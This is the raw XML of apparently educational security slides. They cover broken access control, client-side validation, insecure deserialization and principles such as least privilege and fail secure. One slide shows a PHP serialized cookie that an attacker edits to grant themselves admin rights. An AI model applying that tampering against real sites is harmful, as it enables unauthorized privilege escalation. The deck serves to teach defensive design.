        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16592772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5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D519348-53A8-4917-8E6F-1140742DA561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="609601"/>
            <a:ext cx="8154988" cy="806450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Problem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Incorrect Access Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Diagram 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B02CB6F-D469-4E38-8223-051F42DD07F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498685535"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1981200"/>
          <a:ext cx="8229600"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46" name="Text Box 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC9AF5C9-A427-424C-B207-5F31A682F579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="5980113"/>
            <a:ext cx="5035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b="1"/>
              <a:t>What permissions to use for these forms???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17399795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A2CA163B-EFAE-48B0-8CA4-72F278D8C900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="661989"/>
            <a:ext cx="8154988" cy="754062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Broken Access Control </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="computr1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4D7C5D-FB90-4150-A552-C18DA798F8C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2057400"/>
            <a:ext cx="1809750" cy="1809750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 0 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T8" fmla="*/ 0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2147483646 w 21600"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T24" fmla="*/ 0 w 21600"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 216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4923 w 21600"/>
              <a:gd name="T43" fmla="*/ 2541 h 21600"/>
              <a:gd name="T44" fmla="*/ 16756 w 21600"/>
              <a:gd name="T45" fmla="*/ 11153 h 2160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9999FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558A0CE2-3F83-4BF2-A111-3B050B167EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="2743200"/>
            <a:ext cx="984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a:t>network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14341" name="computr1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED1D284-9322-4840-81C2-07C89AD07964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4038600"/>
            <a:ext cx="1809750" cy="1809750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 0 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T8" fmla="*/ 0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2147483646 w 21600"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T24" fmla="*/ 0 w 21600"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 216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4923 w 21600"/>
              <a:gd name="T43" fmla="*/ 2541 h 21600"/>
              <a:gd name="T44" fmla="*/ 16756 w 21600"/>
              <a:gd name="T45" fmla="*/ 11153 h 2160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7C80"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14342" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3BA05BD-1203-467A-985F-CDC6F9CB5EE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2819400"/>
            <a:ext cx="0" cy="2819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3" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{443C6EC0-5AA1-484E-9880-40B519070CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="5638800"/>
            <a:ext cx="381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4" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C10408-7846-4A95-BDA6-3701DD7442A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="28194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14345" name="Picture 9" descr="BD18219_">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F050CA8-F2AA-4431-AC71-969AF0A661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2362200"/>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6" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD61936-9637-4144-8882-5C23F34731CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3124200"/>
            <a:ext cx="411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7" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E3BABEF-1BA9-4FE0-B5F3-6A790A3364F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2193925" y="2398713"/>
            <a:ext cx="873125" cy="376237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF66"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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b="1"/>
              <a:t>real -&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14348" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF8CAAB-2194-4268-BFB8-DDD7F0599192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2470944" y="4437857"/>
            <a:ext cx="923925" cy="376237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7C80"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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b="1"/>
              <a:t>fake -&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14349" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5DF1B7-3D59-4BAE-972F-5ADFF92CA788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4608513"/>
            <a:ext cx="2454275"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2000" dirty="0"/>
              <a:t>Problem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   Server assumes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   occurred in client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   Does not recheck</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DE5B67-31F5-44B3-AE0A-812D62EDA1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="4278313"/>
            <a:ext cx="306045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2000" dirty="0"/>
              <a:t>Attack: Code is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   reverse engineered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   and modified to change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>   accounts (for example)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4FDD3A2-CBA4-4138-8C80-0BABF1C73D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3505200"/>
            <a:ext cx="1447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50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Program B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFAA4F5-345B-4B1E-9C15-DD217A6375F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5486400"/>
            <a:ext cx="1447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50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Program B*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14354" name="Picture 18" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57698F6F-42C0-42A7-AE59-ACB4BD8C7F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7620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5" name="Picture 19" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A4730F4-A54F-4DD5-9527-BE01D90DBB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7620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5E681-19B1-43FD-B1CE-ABA89C484B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9AC5A53-82D3-48E0-A11B-4FB527BDF9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP object serialization is used to save a “super” cookie, saving the user’s user ID, role, password hash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a:4:{i:0;i:132;i:1;s:6:“Andrea";i:2;s:4:"user";i:3;s:32:“f8a93e098acd823e2d1ac334285fef32";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker changes the serialized object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a:4:{i:0;i:1;i:1;s:5:“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="B2B2B2"/>
                </a:highlight>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="B2B2B2"/>
                </a:highlight>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";i:3;s:32:"f8a93e098acd823e2d1ac334285fef32";}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 15" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C0B4B30-137C-477B-B3AC-BE55252A7C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782011"/>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5" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78D0A870-50DA-46AF-8F1B-2C63B1940A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4800" y="782011"/>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5237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0F4893A-5A01-11C3-DB3D-D9F3A4BE47B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Provide the user the minimum possible required privileges at time of execution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which features may be turned off or utilities removed? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Complete mediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Access rights are completely validated each time an access occurs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file permissions may change while file is opened</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user accesses may have time limitations (e.g., first shift)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user abusing privileges may need to have permissions suddenly revoked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail Secure Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  A subject is given explicit access to an object, only when access is explicitly defined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail Close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: When a firewall aborts, no packets are allowed through.  The alternative, fail open would give access to unauthorized use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail Safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: A locked door opens during a fire.  Here, loss of life is given priority over security.  Note that Fail Safe may mean Fail Closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{108029F0-9252-9189-1707-9FF4E456B049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
